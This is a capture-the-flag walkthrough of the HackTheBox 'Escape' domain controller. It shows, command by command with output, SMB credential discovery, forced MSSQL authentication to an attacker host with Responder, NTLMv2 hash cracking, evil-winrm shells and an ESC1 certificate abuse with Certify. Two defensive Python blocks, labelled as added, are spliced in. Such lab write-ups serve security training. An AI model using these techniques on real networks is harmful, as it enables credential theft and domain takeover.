Run a quick nmap scan:
└─$ nmap -sC -sV -Pn -v 10.129.228.253
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 03:03 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:03
Completed NSE at 03:03, 0.00s elapsed
Initiating NSE at 03:03
Completed NSE at 03:03, 0.00s elapsed
Initiating NSE at 03:03
Completed NSE at 03:03, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 03:03
Completed Parallel DNS resolution of 1 host. at 03:03, 0.00s elapsed
Initiating SYN Stealth Scan at 03:03
Scanning 10.129.228.253 [1000 ports]
Discovered open port 445/tcp on 10.129.228.253
Discovered open port 53/tcp on 10.129.228.253
Discovered open port 135/tcp on 10.129.228.253
Discovered open port 139/tcp on 10.129.228.253
Discovered open port 593/tcp on 10.129.228.253
Discovered open port 389/tcp on 10.129.228.253
Discovered open port 1433/tcp on 10.129.228.253
Discovered open port 88/tcp on 10.129.228.253
Discovered open port 636/tcp on 10.129.228.253
Discovered open port 464/tcp on 10.129.228.253
Discovered open port 3269/tcp on 10.129.228.253
Discovered open port 3268/tcp on 10.129.228.253
Completed SYN Stealth Scan at 03:03, 7.25s elapsed (1000 total ports)
Initiating Service scan at 03:03
Scanning 12 services on 10.129.228.253
Completed Service scan at 03:04, 47.08s elapsed (12 services on 1 host)
NSE: Script scanning 10.129.228.253.
Initiating NSE at 03:04
Completed NSE at 03:05, 40.18s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 2.73s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Nmap scan report for 10.129.228.253
Host is up (0.13s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-12 15:03:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-12T15:05:17+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-12T15:05:16+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.228.253:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.228.253:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-12T15:02:09
| Not valid after: 2054-10-12T15:02:09
| MD5: 6b21:24f9:e4e3:c876:c251:2483:16c9:b9b5
|_SHA-1: 81ab:c3b1:46d0:f00c:0bc0:7edb:6970:6422:9c57:c1a9
|_ssl-date: 2024-10-12T15:05:17+00:00; +8h00m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-12T15:05:17+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
|_SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
|_ssl-date: 2024-10-12T15:05:16+00:00; +8h00m00s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 8h00m00s
| smb2-time:
| date: 2024-10-12T15:04:36
|_ start_date: N/A
NSE: Script Post-scanning.
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Initiating NSE at 03:05
Completed NSE at 03:05, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.68 seconds
Raw packets sent: 1989 (87.516KB) | Rcvd: 13 (572B)
What is the domain name for Escape as enumerated from the LDAP service? sequel.htb
What is the name of the non-standard SMB share on Escape? Public
To enumerate SMB shares, we will try to list them with smbclient and an anonymous login:
└─$ smbclient -L \\\\10.129.228.253\\
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.228.253 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
What is the password for the PublicUser on MSSQL?
We will enumerate the SMB share a bit more to find out, downloading SQL Server Procedures.pdf:
└─$ smbclient \\\\10.129.228.253\\public
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1440678 blocks available
smb: \> mget *
Get file SQL Server Procedures.pdf? yes
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (65.0 KiloBytes/sec) (average 65.0 KiloBytes/sec)
smb: \> exit
Upon reading the PDF, we find the public user's credentials:
cmdkey /add:"<serverName>.sequel.htb" /user:"sequel\<userame>" /pass:<password>
The user is PublicUser and the password is GuestUserCantWrite1.
What user is the MSSQL instance running as? sql_svc
Get the MSSQL server to read a file from an SMB host you control, and watch for the authentication.
With the creds, I can connect to the MSSQL server. I’ll use the Impacket tool mssqlclient.py:
└─$ impacket-mssqlclient sequel.htb/PublicUser@10.129.228.253
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
There are four databases on this server:
SQL (PublicUser guest@master)> select name from master..sysdatabases;
name
------
master
tempdb
model
msdb
I tried running commands through the MSSQL server using the xp_cmdshell stored procedure. Unfortunately I get permission denied:
SQL (PublicUser guest@master)> xp_cmdshell whoami;
ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
The next thing to try is to get the SQL server to connect back to our host and authenticate, so that we can capture the challenge/response.
We will start Responder here as root, listening on a bunch of services on the tun0 interface:
└─$ sudo python3 /usr/share/responder/Responder.py -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [OFF]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [OFF]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [OFF]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.8]
Responder IPv6 [dead:beef:2::1006]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-9A6WSBC7SGR]
Responder Domain Name [Q02Q.LOCAL]
Responder DCE-RPC Port [49413]
[+] Listening for events...
Remember to turn off unnecessary services such as HTTPS, LDAPS and WinRM in the Responder config:
└─$ sudo nano /usr/share/responder/Responder.conf
Now we will tell MSSQL to read a file on a share on our host:
SQL (PublicUser guest@master)> EXEC xp_dirtree '\\10.10.14.8\share', 1, 1
subdirectory depth file
------------ ----- ----
Responder captures the NTLMv2 hash:
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.228.253
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:a18f0f31fd5a9e73:949209A630AB7E59E106E366CC2F429B:010100000000000000F4F502561CDB0172ECD403C591980B0000000002000800510030003200510001001E00570049004E002D003900410036005700530042004300370053004700520004003400570049004E002D00390041003600570053004200430037005300470052002E0051003000320051002E004C004F00430041004C000300140051003000320051002E004C004F00430041004C000500140051003000320051002E004C004F00430041004C000700080000F4F502561CDB0106000400020000000800300030000000000000000000000000300000EFB4F169095B479DBEFC1891A254C898D4E56D62F13DEB44F2A502661CC742F10A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0038000000000000000000
We will use hashcat to crack this NTLMv2 hash. We can identify which hashcat module number to use by running:
└─$ hashcat --help | grep -i ntlmv2
5600 | NetNTLMv2 | Network Protocol
27100 | NetNTLMv2 (NT) | Network Protocol
We will copy and save the hash as sql_svc.hash and run hashcat to crack it:
└─$ hashcat -m 5600 sql_svc.hash /usr/share/wordlists/rockyou.txt
SQL_SVC::sequel:a18f0f31fd5a9e73:949209a630ab7e59e106e366cc2f429b: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:REGGIE1234ronnie
What is the sql_svc user's password? REGGIE1234ronnie
What is the Ryan.Cooper user's password? Enumerate the SQLServer logs. It seems Ryan entered a password as a username at least once.
Running nxc winrm, we can see that WinRM is enabled on the DC:
└─$ nxc winrm 10.129.228.253
WINRM 10.129.228.253 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
Use evil-winrm with sql_svc’s credentials:
└─$ evil-winrm -i 10.129.228.253 -u sql_svc -p REGGIE1234ronnie
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents>
Navigating through the directories, we can see a log file at C:\SQLServer\Logs\ERRORLOG.BAK:
*Evil-WinRM* PS C:\SQLServer\Logs> ls
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
*Evil-WinRM* PS C:\SQLServer\Logs> cat ERRORLOG.BAK
Upon reading through the logs, we see that Ryan.Cooper entered his password in the username field of a failed logon:
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:43:07.76 spid51 Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required.
2022-11-18 13:43:08.24 spid51 Changed database context to 'master'.
2022-11-18 13:43:08.24 spid51 Changed language setting to us_english.
2022-11-18 13:43:09.29 spid9s SQL Server is terminating in response to a 'stop' request from Service Control Manager. This is an informational message only. No user action is required.
2022-11-18 13:43:09.31 spid9s .NET Framework runtime has been stopped.
2022-11-18 13:43:09.43 spid9s SQL Trace was stopped due to server shutdown. Trace ID = '1'. This is an informational message only; no user action is required.
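As an added illustration (not part of the original writeup) of how a defender could catch this pattern in a SQL Server error log, the Python below scans constructed sample lines modelled on the excerpt above: a failed logon whose login name is not shaped like an account and that closely follows a failed logon for a real domain account from the same client is flagged, without echoing the suspected secret. The `known_logins` list, the 30-second window and the sql_svc sample line are my own assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample modelled on the ERRORLOG.BAK excerpt in the walkthrough;
# the Ryan.Cooper/NuclearMosquito3 pair follows the excerpt, the sql_svc line is made up.
SAMPLE_ERRORLOG = """\
2022-11-18 13:43:05.10 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:05.10 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:08.24 spid51      Changed database context to 'master'.
2022-11-18 14:10:00.00 Logon       Logon failed for user 'sequel.htb\\sql_svc'. Reason: Password did not match that for the login provided. [CLIENT: 10.129.0.50]
"""

# One "Logon failed" line: timestamp, the login name exactly as typed, and the client address.
LOGON_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failed_logons(log_text):
    """Return (timestamp, login, client) tuples for every failed logon in the log."""
    events = []
    for line in log_text.splitlines():
        m = LOGON_FAILED.match(line)
        if m:
            events.append((datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                           m["user"], m["client"]))
    return events


def looks_like_account(login, known_logins):
    """A domain-qualified name or a known SQL login is a plausible account name."""
    return "\\" in login or "@" in login or login.lower() in known_logins


def find_secrets_in_username(log_text, known_logins=(), window=timedelta(seconds=30)):
    """Flag failed logons whose 'user' is not an account name and that closely follow a
    failed logon for a real domain account from the same client: the classic
    'typed the password into the username box' pattern. The suspected secret is never
    returned in clear, only its length, so the finding can be logged or ticketed safely."""
    known = {k.lower() for k in known_logins}
    events = parse_failed_logons(log_text)
    findings = []
    for i, (ts, login, client) in enumerate(events):
        if looks_like_account(login, known):
            continue
        # Walk back through earlier failures from the same client inside the window.
        for prev_ts, prev_login, prev_client in reversed(events[:i]):
            if ts - prev_ts > window:
                break
            if prev_client == client and looks_like_account(prev_login, known):
                findings.append({
                    "when": ts.isoformat(),
                    "account": prev_login,
                    "client": client,
                    "secret_length": len(login),
                    "action": "treat this account's password as exposed; rotate it and purge the log line",
                })
                break
    return findings


if __name__ == "__main__":
    for finding in find_secrets_in_username(SAMPLE_ERRORLOG, known_logins={"sa", "PublicUser"}):
        print(finding)
```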
Open up another evil-winrm session using Ryan Cooper’s credentials and find user.txt on Ryan’s Desktop:
└─$ evil-winrm -i 10.129.228.253 -u 'ryan.cooper' -p NuclearMosquito3
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ls
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> ls
Directory: C:\Users\Ryan.Cooper\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/12/2024 8:02 AM 34 user.txt
*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> cat user.txt
ee206be1fed80997ddc918f87dfa1bc3
*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : dc
Primary Dns Suffix . . . . . . . : sequel.htb
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : sequel.htb
.htb
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
Physical Address. . . . . . . . . : 00-50-56-B9-7A-DD
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : dead:beef::4962:1632:659d:e390(Preferred)
Link-local IPv6 Address . . . . . : fe80::4962:1632:659d:e390%4(Preferred)
IPv4 Address. . . . . . . . . . . : 10.129.228.253(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Lease Obtained. . . . . . . . . . : Saturday, October 12, 2024 8:01:29 AM
Lease Expires . . . . . . . . . . : Saturday, October 12, 2024 9:31:29 AM
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:acf1%4
10.129.0.1
DHCP Server . . . . . . . . . . . : 10.129.0.1
DHCPv6 IAID . . . . . . . . . . . : 251678806
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-88-DA-51-00-0C-29-37-43-59
DNS Servers . . . . . . . . . . . : 127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
What is the name of the vulnerable ADCS template on Escape? Try a tool like Certify or Certipy to enumerate ADCS.
We will look for Active Directory Certificate Services (ADCS). A quick way to check for this is using nxc or crackmapexec:
└─$ nxc ldap 10.129.228.253 -u 'ryan.cooper' -p NuclearMosquito3 -M adcs
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
SMB 10.129.228.253 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAPS 10.129.228.253 636 DC [+] sequel.htb\ryan.cooper:NuclearMosquito3
ADCS 10.129.228.253 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.129.228.253 389 DC Found PKI Enrollment Server: dc.sequel.htb
ADCS 10.129.228.253 389 DC Found CN: sequel-DC-CA
We will need to see if any templates in this ADCS are insecurely configured. To enumerate further, we will download a copy of Certify from SharpCollection and upload it to Escape:
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> upload Certify.exe
Info: Uploading /home/kali/Tools/Certify.exe to C:\Users\Ryan.Cooper\documents\Certify.exe
Data: 238248 bytes of 238248 bytes copied
Info: Upload successful!
We will run Certify.exe find /vulnerable /currentuser to check the templates against the current user's groups. Certify then lists a single vulnerable certificate template:
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> .\Certify.exe find /vulnerable /currentuser
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using current user's unrolled group SIDs for vulnerability checks.
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Certify completed in 00:00:10.2391560
The danger here is that sequel\Domain Users has Enrollment Rights on a template that lets the enrollee supply the subject (ENROLLEE_SUPPLIES_SUBJECT) and that allows Client Authentication, with no manager approval or authorized signature required.
What is the name of the vulnerable ADCS template on Escape? UserAuthentication
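The following Python is an added example, not part of the writeup or of Certify, that encodes the ESC1 conditions Certify checks here as an audit function a defender can run over exported template attributes. The UserAuthentication values are transcribed from the Certify output above; the LOW_PRIV and AUTH_EKUS sets, the hardened variant and the remediation wording are my own assumptions.

```python
from dataclasses import dataclass, replace

# Principals whose membership amounts to "any domain account" (assumed list).
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone", "Users"}
# EKUs that let a certificate be used for Kerberos/Schannel logon (assumed list).
AUTH_EKUS = {"Client Authentication", "Smart Card Logon", "PKINIT Client Authentication", "Any Purpose"}


@dataclass
class Template:
    name: str
    name_flags: set           # msPKI-Certificate-Name-Flag
    enrollment_flags: set     # msPKI-Enrollment-Flag
    signatures_required: int  # Authorized Signatures Required
    ekus: set                 # pKIExtendedKeyUsage
    enrollment_rights: set    # principals holding Enroll on the template


def low_priv_enrollers(principals):
    """Strip the domain prefix and keep only the catch-all groups."""
    return {p.split("\\")[-1] for p in principals} & LOW_PRIV


def esc1_check(t, ca_enroll_rights):
    """Evaluate the six ESC1 conditions. Returns (is_esc1, satisfied, remediations)."""
    conditions = [
        ("CA grants Enroll to low-privileged users", bool(low_priv_enrollers(ca_enroll_rights))),
        ("template grants Enroll to low-privileged users", bool(low_priv_enrollers(t.enrollment_rights))),
        ("manager approval not required", "PEND_ALL_REQUESTS" not in t.enrollment_flags),
        ("no authorized signatures required", t.signatures_required == 0),
        ("EKU allows authentication", not t.ekus or bool(t.ekus & AUTH_EKUS)),
        ("enrollee supplies the subject/SAN", "ENROLLEE_SUPPLIES_SUBJECT" in t.name_flags),
    ]
    satisfied = [name for name, ok in conditions if ok]
    is_esc1 = len(satisfied) == len(conditions)
    remediations = []
    if is_esc1:
        # Breaking any one of the template-side conditions closes the ESC1 path.
        groups = ", ".join(sorted(low_priv_enrollers(t.enrollment_rights)))
        remediations = [
            f"{t.name}: clear ENROLLEE_SUPPLIES_SUBJECT so the subject is built from AD",
            f"{t.name}: remove {groups} from the template's Enroll rights",
            f"{t.name}: require manager approval (PEND_ALL_REQUESTS) or an authorized signature",
        ]
    return is_esc1, satisfied, remediations


# Values transcribed from the Certify output for the UserAuthentication template.
USER_AUTHENTICATION = Template(
    name="UserAuthentication",
    name_flags={"ENROLLEE_SUPPLIES_SUBJECT"},
    enrollment_flags={"INCLUDE_SYMMETRIC_ALGORITHMS", "PUBLISH_TO_DS"},
    signatures_required=0,
    ekus={"Client Authentication", "Encrypting File System", "Secure Email"},
    enrollment_rights={"sequel\\Domain Admins", "sequel\\Domain Users", "sequel\\Enterprise Admins"},
)
# From the CA permissions block: Authenticated Users hold Enroll on the CA.
CA_ENROLL_RIGHTS = {"NT AUTHORITY\\Authenticated Users"}

# Constructed hardened variant: the same template with the subject built from AD.
HARDENED = replace(USER_AUTHENTICATION, name_flags={"SUBJECT_ALT_REQUIRE_UPN"})


if __name__ == "__main__":
    for tmpl in (USER_AUTHENTICATION, HARDENED):
        vuln, met, fixes = esc1_check(tmpl, CA_ENROLL_RIGHTS)
        print(tmpl.name, "ESC1" if vuln else "not ESC1", met, fixes, sep="\n  ")
```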
What is the administrator user's NTLM hash? Exploit the ESC1 vulnerability in the UserAuthentication template to leak this.
We will run Certify.exe to request a certificate with an alternative name of administrator. It returns a cert.pem:
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : administrator
[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 13
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
